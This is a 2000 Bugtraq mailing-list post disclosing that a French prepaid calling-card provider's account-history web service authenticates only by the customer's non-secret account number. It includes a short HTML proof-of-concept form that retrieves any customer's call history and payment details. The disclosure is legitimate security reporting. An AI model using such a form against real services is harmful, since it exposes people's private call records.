Bugtraq mailing list archives
First Telecom E-conso service totally insecure
From: thomas () CUIVRE FR EU ORG (Thomas Quinot)
Date: Tue, 4 Jan 2000 00:10:30 +0100
First Telecom, a company that provides a pre-paid calling card service in France, Germany and the United Kingdom, offers a service called E-conso which allows subscribers to check the current balance of their account and peruse the history of all calls they made through First Telecom. The WWW form at the home page of the service requires entry of the account number (which is printed on all First Telecom documents and embossed on the plastic membership card sent to every subscriber), as well as a password chosen by the customer during the sign-up procedure. The submission of this form returns a page which includes the customer's name and address, and a form (with a /fixed/ "action" URL) which contains the customer's account number as a "hidden" field. Submission of this form returns the details of payements or the call history, depending on which button is clicked by the customer. No hidden field and no cookie is used to pass any client credentials back to the server. Which means it is trivial to retrieve the details of past payements as well as the call history of a First Telecom customer knowing only her (non-secret) account number. The HTML code included demonstrates this important flaw. Thomas. ---------- cut here : first.html <html> <head> <title>First Telecom e-conso exploit</title> </head> <body> <form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST"> <p> Account number: <input type="text" name="cmaster" value="0000000"> <input type="submit" name="cmdcdr" value="Details of calls"> <input type="submit" name="cmdpaymenthistory" value="Details of payements"> </body> </html>
Current thread:
- Symlinks and Cryogenic Sleep Olaf Kirch (Jan 03)
- Re: Symlinks and Cryogenic Sleep Mark A. Heilpern (Jan 03)
- Re: Symlinks and Cryogenic Sleep Casper Dik (Jan 04)
- Re: Symlinks and Cryogenic Sleep Olaf Kirch (Jan 04)
- Re: Symlinks and Cryogenic Sleep Henrik Nordstrom (Jan 04)
- First Telecom E-conso service totally insecure Thomas Quinot (Jan 03)
- Re: Symlinks and Cryogenic Sleep Goetz Babin-Ebell (Jan 04)
- Re: Symlinks and Cryogenic Sleep pedward () WEBCOM COM (Jan 04)
- Re: Symlinks and Cryogenic Sleep Christos Zoulas (Jan 04)
- Re: Symlinks and Cryogenic Sleep Mikael Olsson (Jan 05)
- Re: Symlinks and Cryogenic Sleep Marc Heuse (Jan 05)
- Re: Symlinks and Cryogenic Sleep Wietse Venema (Jan 04)
- Re: Symlinks and Cryogenic Sleep Pavel Machek (Jan 04)
- Security problem with Solstice Backup/Legato Networker recover command Chris Siebenmann (Jan 04)
- Local / Remote D.o.S Attack in IMail IMONITOR Server for WinNT Version 5.08 Ussr Labs (Jan 05)
- Re: Symlinks and Cryogenic Sleep Pavel Kankovsky (Jan 05)
(Thread continues...)
- Re: Symlinks and Cryogenic Sleep Mark A. Heilpern (Jan 03)